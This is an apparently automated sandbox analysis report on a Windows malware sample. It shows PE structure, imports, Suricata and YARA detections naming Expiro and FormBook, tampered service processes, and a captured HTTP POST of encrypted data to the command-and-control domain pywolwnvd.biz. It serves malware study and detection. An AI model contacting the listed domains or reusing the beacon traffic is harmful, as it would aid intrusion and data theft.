                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xc70000x5b9540x5ba0011a8839e487c2ce9253c697970277011False0.9281766925306958data7.89506970135949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1230000x960000x95000ae58810b8356e4276db6e9e1c353eeaaFalse0.9757563443791947data7.938045915639303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                  RT_RCDATA0xcf7b80x52c1adata1.0003274626073104
                  RT_GROUP_ICON0x1223d40x76dataEnglishGreat Britain0.6610169491525424
                  RT_GROUP_ICON0x12244c0x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x1224600x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x1224740x14dataEnglishGreat Britain1.25
                  RT_VERSION0x1224880xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x1225640x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                  Imports

                  DLLImport
                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLLGetProcessMemoryInfo
                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dllIsThemeActive
                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2025-01-10T22:55:57.553921+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54970454.244.188.17780TCP
                  2025-01-10T22:55:57.680935+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549704TCP
                  2025-01-10T22:55:57.680935+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549704TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 10, 2025 22:55:56.841007948 CET4970480192.168.2.554.244.188.177
                  Jan 10, 2025 22:55:56.845947981 CET804970454.244.188.177192.168.2.5
                  Jan 10, 2025 22:55:56.846029043 CET4970480192.168.2.554.244.188.177
                  Jan 10, 2025 22:55:56.846955061 CET4970480192.168.2.554.244.188.177
                  Jan 10, 2025 22:55:56.846982956 CET4970480192.168.2.554.244.188.177
                  Jan 10, 2025 22:55:56.851819992 CET804970454.244.188.177192.168.2.5
                  Jan 10, 2025 22:55:56.851834059 CET804970454.244.188.177192.168.2.5
                  Jan 10, 2025 22:55:57.553577900 CET804970454.244.188.177192.168.2.5
                  Jan 10, 2025 22:55:57.553730011 CET804970454.244.188.177192.168.2.5
                  Jan 10, 2025 22:55:57.553920984 CET4970480192.168.2.554.244.188.177
                  Jan 10, 2025 22:55:57.675823927 CET4970480192.168.2.554.244.188.177
                  Jan 10, 2025 22:55:57.680934906 CET804970454.244.188.177192.168.2.5

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 10, 2025 22:55:56.684689045 CET6453753192.168.2.51.1.1.1
                  Jan 10, 2025 22:55:56.692035913 CET53645371.1.1.1192.168.2.5
                  Jan 10, 2025 22:55:57.789408922 CET5828153192.168.2.51.1.1.1
                  Jan 10, 2025 22:55:57.976327896 CET53582811.1.1.1192.168.2.5

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 10, 2025 22:55:56.684689045 CET192.168.2.51.1.1.10x2ae5Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                  Jan 10, 2025 22:55:57.789408922 CET192.168.2.51.1.1.10x3f9Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 10, 2025 22:55:56.692035913 CET1.1.1.1192.168.2.50x2ae5No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                  Jan 10, 2025 22:55:57.976327896 CET1.1.1.1192.168.2.50x3f9No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • pywolwnvd.biz

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.54970454.244.188.177805036C:\Users\user\Desktop\UaOJAOMxcU.exe
                  TimestampBytes transferredDirectionData
                  Jan 10, 2025 22:55:56.846955061 CET353OUTPOST /rhimsaly HTTP/1.1
                  Cache-Control: no-cache
                  Connection: Keep-Alive
                  Pragma: no-cache
                  Host: pywolwnvd.biz
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                  Content-Length: 804
                  Jan 10, 2025 22:55:56.846982956 CET804OUTData Raw: cb a4 38 90 fb 50 c1 90 18 03 00 00 0c 71 ae 54 6f 23 73 11 d9 ae 51 38 02 b5 71 a2 2c 7b 19 f8 48 38 d7 9d a9 33 57 d9 8e 12 86 67 50 f0 dd c9 20 cb ab 17 d1 16 41 66 12 0d 7c e7 9d 67 bd 67 f6 7d 2d 6a 5e 95 24 c3 07 17 fc 10 c9 3c ea ff 5c 48
                  Data Ascii: 8PqTo#sQ8q,{H83WgP Af|gg}-j^$<\H&]YU}J(^SZ/}Uq=D)[Pdh5JF-C/!z7g?#Y#Vj'RZ]Eg2X%S9'0*a`XUZ$D4q#/
                  Jan 10, 2025 22:55:57.553577900 CET413INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Fri, 10 Jan 2025 21:55:57 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: btst=0b3c6bfe9027852d4c1a42f13259ae8a|8.46.123.189|1736546157|1736546157|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                  Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:16:55:54
                  Start date:10/01/2025
                  Path:C:\Users\user\Desktop\UaOJAOMxcU.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UaOJAOMxcU.exe"
                  Imagebase:0x400000
                  File size:1'777'664 bytes
                  MD5 hash:97A3CC0911D35ED963283AFB08B1E671
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:16:55:54
                  Start date:10/01/2025
                  Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Imagebase:0x400000
                  File size:1'658'880 bytes
                  MD5 hash:717063427E4960E26A9AEEA93FFA8BC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:false

                  General

                  Target ID:3
                  Start time:16:55:55
                  Start date:10/01/2025
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\UaOJAOMxcU.exe"
                  Imagebase:0x510000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:16:55:55
                  Start date:10/01/2025
                  Path:C:\Windows\System32\alg.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\alg.exe
                  Imagebase:0x140000000
                  File size:1'594'368 bytes
                  MD5 hash:791FE83149B027ED288BF7B3D73209AA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:false

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4%
                    Dynamic/Decrypted Code Coverage:6.7%
                    Signature Coverage:6.5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:60
                    execution_graph 109061 ae520c 109064 b0cbd0 109061->109064 109063 ae5211 109065 b0be50 _wcslen 109064->109065 109065->109063 109065->109064 109066 b0c168 109065->109066 109068 b0bfe9 109065->109068 109070 b0bffd StrStrIW 109065->109070 109071 b0c78e CloseServiceHandle 109065->109071 109072 b0c706 StrStrIW 109065->109072 109073 b0c72b StrStrIW 109065->109073 109075 b0bf68 StrStrIW 109065->109075 109077 b0c0fd CloseServiceHandle 109065->109077 109078 b0c399 StrStrIW 109065->109078 109080 b0c7e4 StartServiceW 109065->109080 109082 b0bf7e 109065->109082 109083 b0c65a ChangeServiceConfigW 109065->109083 109084 aece90 109065->109084 109102 b0a350 CloseServiceHandle 109065->109102 109104 ae5d20 109065->109104 109103 b0a905 LocalFree 109066->109103 109068->109063 109070->109065 109071->109065 109072->109065 109073->109065 109075->109065 109077->109065 109078->109065 109079 b0c3a9 109078->109079 109079->109063 109080->109065 109081 b0c36b OpenServiceW 109081->109065 109082->109080 109082->109081 109083->109065 109083->109068 109093 aecc9b _wcslen 109084->109093 109085 aed729 GetFileSizeEx 109088 aed8a1 CloseHandle 109085->109088 109085->109093 109086 aed426 109086->109088 109089 aed42a CloseHandle 109086->109089 109087 aed5c5 CreateFileW 109087->109093 109088->109093 109089->109093 109091 aecd5c lstrcmpiW 109091->109093 109092 aecca0 lstrcmpiW 109092->109093 109093->109065 109093->109084 109093->109085 109093->109086 109093->109087 109093->109088 109093->109089 109093->109091 109093->109092 109094 aed049 SetFilePointerEx 109093->109094 109096 ae5d20 VirtualAlloc VirtualFree 109093->109096 109097 aed378 CloseHandle 109093->109097 109098 aecfbb GetFileTime 109093->109098 109099 aecc92 109093->109099 109101 aed903 109093->109101 109109 ae8937 VirtualAlloc VirtualFree 109093->109109 109110 ae8470 VirtualAlloc VirtualFree 109093->109110 109094->109093 109096->109093 109097->109093 109098->109093 109099->109065 109100 b1fdfc 40 API calls 109100->109101 109101->109099 109101->109100 109102->109065 109103->109068 109106 ae5d22 109104->109106 109105 ae5d39 VirtualAlloc 109105->109106 109106->109065 109106->109105 109108 ae5d46 VirtualFree 109106->109108 109108->109065 109109->109093 109110->109093 109111 c2fe00 109125 c2da50 109111->109125 109113 c2feca 109128 c2fcf0 109113->109128 109127 c2e0db 109125->109127 109131 c30ef0 GetPEB 109125->109131 109127->109113 109129 c2fcf9 Sleep 109128->109129 109130 c2fd07 109129->109130 109131->109127 109132 43fe27 109145 41f944 109132->109145 109134 43fe3d 109135 43fe53 109134->109135 109136 43febe 109134->109136 109234 409e5d 60 API calls 109135->109234 109154 40fce0 109136->109154 109138 43fe92 109139 44089c 109138->109139 109140 43fe9a 109138->109140 109236 469e4a 89 API calls 4 library calls 109139->109236 109235 46834f 59 API calls Mailbox 109140->109235 109144 43feb2 Mailbox 109144->109144 109146 41f950 109145->109146 109147 41f962 109145->109147 109237 409d3c 60 API calls Mailbox 109146->109237 109149 41f991 109147->109149 109150 41f968 109147->109150 109248 409d3c 60 API calls Mailbox 109149->109248 109238 420db6 109150->109238 109152 41f95a 109152->109134 109277 408180 109154->109277 109156 40fd3d 109158 44472d 109156->109158 109218 4106f6 109156->109218 109282 40f234 109156->109282 109400 469e4a 89 API calls 4 library calls 109158->109400 109161 410545 _memmove 109193 420db6 Mailbox 59 API calls 109161->109193 109162 40fdd3 109162->109161 109163 40fe3e 109162->109163 109164 410517 109162->109164 109167 420db6 59 API calls Mailbox 109162->109167 109169 444755 109162->109169 109174 444742 109162->109174 109206 44480c 109162->109206 109374 409ea0 109162->109374 109175 40fe4c 109163->109175 109192 44488d 109163->109192 109404 4566ec 59 API calls 2 library calls 109163->109404 109172 420db6 Mailbox 59 API calls 109164->109172 109165 444b53 109165->109174 109425 469e4a 89 API calls 4 library calls 109165->109425 109167->109162 109185 4447d7 109169->109185 109401 40f6a3 341 API calls 109169->109401 109172->109161 109173 444848 109405 4560ef 59 API calls 2 library calls 109173->109405 109175->109165 109176 4448f9 109175->109176 109286 40837c 109175->109286 109184 444917 109176->109184 109408 4085c0 59 API calls Mailbox 109176->109408 109180 40fea4 109190 444ad6 109180->109190 109191 40ff32 109180->109191 109226 410179 Mailbox _memmove 109180->109226 109181 44486b 109186 409ea0 341 API calls 109181->109186 109182 4448b2 Mailbox 109182->109175 109407 4566ec 59 API calls 2 library calls 109182->109407 109188 444928 109184->109188 109409 4085c0 59 API calls Mailbox 109184->109409 109185->109174 109402 469e4a 89 API calls 4 library calls 109185->109402 109186->109192 109188->109226 109410 4560ab 59 API calls Mailbox 109188->109410 109419 469ae7 60 API calls 109190->109419 109195 420db6 Mailbox 59 API calls 109191->109195 109192->109174 109192->109175 109406 47a2d9 85 API calls Mailbox 109192->109406 109232 410106 _memmove 109193->109232 109198 40ff39 109195->109198 109198->109218 109293 4109d0 109198->109293 109200 444a4d 109201 409ea0 341 API calls 109200->109201 109203 444a87 109201->109203 109203->109174 109414 4084c0 109203->109414 109205 40ffb2 109205->109161 109212 40ffe6 109205->109212 109205->109218 109403 469e4a 89 API calls 4 library calls 109206->109403 109210 444ab2 109418 469e4a 89 API calls 4 library calls 109210->109418 109220 410007 109212->109220 109420 408047 109212->109420 109216 420db6 59 API calls Mailbox 109216->109226 109399 469e4a 89 API calls 4 library calls 109218->109399 109219 410398 109219->109144 109220->109218 109221 444b24 109220->109221 109223 41004c 109220->109223 109424 409d3c 60 API calls Mailbox 109221->109424 109223->109165 109223->109218 109224 4100d8 109223->109224 109370 409d3c 60 API calls Mailbox 109224->109370 109226->109200 109226->109210 109226->109216 109226->109218 109226->109219 109227 444a1c 109226->109227 109372 408740 68 API calls __cinit 109226->109372 109373 408660 68 API calls 109226->109373 109411 465937 68 API calls 109226->109411 109412 4089b3 69 API calls Mailbox 109226->109412 109413 409d3c 60 API calls Mailbox 109226->109413 109230 420db6 Mailbox 59 API calls 109227->109230 109228 4100eb 109228->109218 109371 4082df 59 API calls Mailbox 109228->109371 109230->109200 109232->109226 109233 410162 109232->109233 109398 409c90 59 API calls Mailbox 109232->109398 109233->109144 109234->109138 109235->109144 109236->109144 109237->109152 109241 420dbe 109238->109241 109240 420dd8 109240->109152 109241->109240 109243 420ddc std::exception::exception 109241->109243 109249 42571c 109241->109249 109266 4233a1 DecodePointer 109241->109266 109267 42859b RaiseException 109243->109267 109245 420e06 109268 4284d1 58 API calls _free 109245->109268 109247 420e18 109247->109152 109248->109152 109250 425797 109249->109250 109257 425728 109249->109257 109275 4233a1 DecodePointer 109250->109275 109252 42579d 109276 428b28 58 API calls __getptd_noexit 109252->109276 109255 42575b RtlAllocateHeap 109255->109257 109265 42578f 109255->109265 109257->109255 109258 425733 109257->109258 109259 425783 109257->109259 109263 425781 109257->109263 109272 4233a1 DecodePointer 109257->109272 109258->109257 109269 42a16b 58 API calls 2 library calls 109258->109269 109270 42a1c8 58 API calls 7 library calls 109258->109270 109271 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109258->109271 109273 428b28 58 API calls __getptd_noexit 109259->109273 109274 428b28 58 API calls __getptd_noexit 109263->109274 109265->109241 109266->109241 109267->109245 109268->109247 109269->109258 109270->109258 109272->109257 109273->109263 109274->109265 109275->109252 109276->109265 109278 40818f 109277->109278 109281 4081aa 109277->109281 109426 407e4f 109278->109426 109280 408197 CharUpperBuffW 109280->109281 109281->109156 109283 40f251 109282->109283 109284 40f272 109283->109284 109430 469e4a 89 API calls 4 library calls 109283->109430 109284->109162 109287 40838d 109286->109287 109288 43edbd 109286->109288 109289 420db6 Mailbox 59 API calls 109287->109289 109291 408394 109289->109291 109290 4083b5 109290->109176 109290->109180 109291->109290 109431 408634 59 API calls Mailbox 109291->109431 109294 444cc3 109293->109294 109306 4109f5 109293->109306 109494 469e4a 89 API calls 4 library calls 109294->109494 109296 410ce4 109297 410cfa 109296->109297 109491 411070 10 API calls Mailbox 109296->109491 109297->109205 109299 410ee4 109299->109297 109301 410ef1 109299->109301 109492 411093 341 API calls Mailbox 109301->109492 109302 410a4b PeekMessageW 109323 410a05 Mailbox 109302->109323 109305 410ef8 LockWindowUpdate DestroyWindow GetMessageW 109305->109297 109308 410f2a 109305->109308 109306->109323 109495 409e5d 60 API calls 109306->109495 109496 456349 341 API calls 109306->109496 109307 444e81 Sleep 109307->109323 109310 445c58 TranslateMessage DispatchMessageW GetMessageW 109308->109310 109310->109310 109311 445c88 109310->109311 109311->109297 109312 409e5d 60 API calls 109312->109323 109313 410e43 PeekMessageW 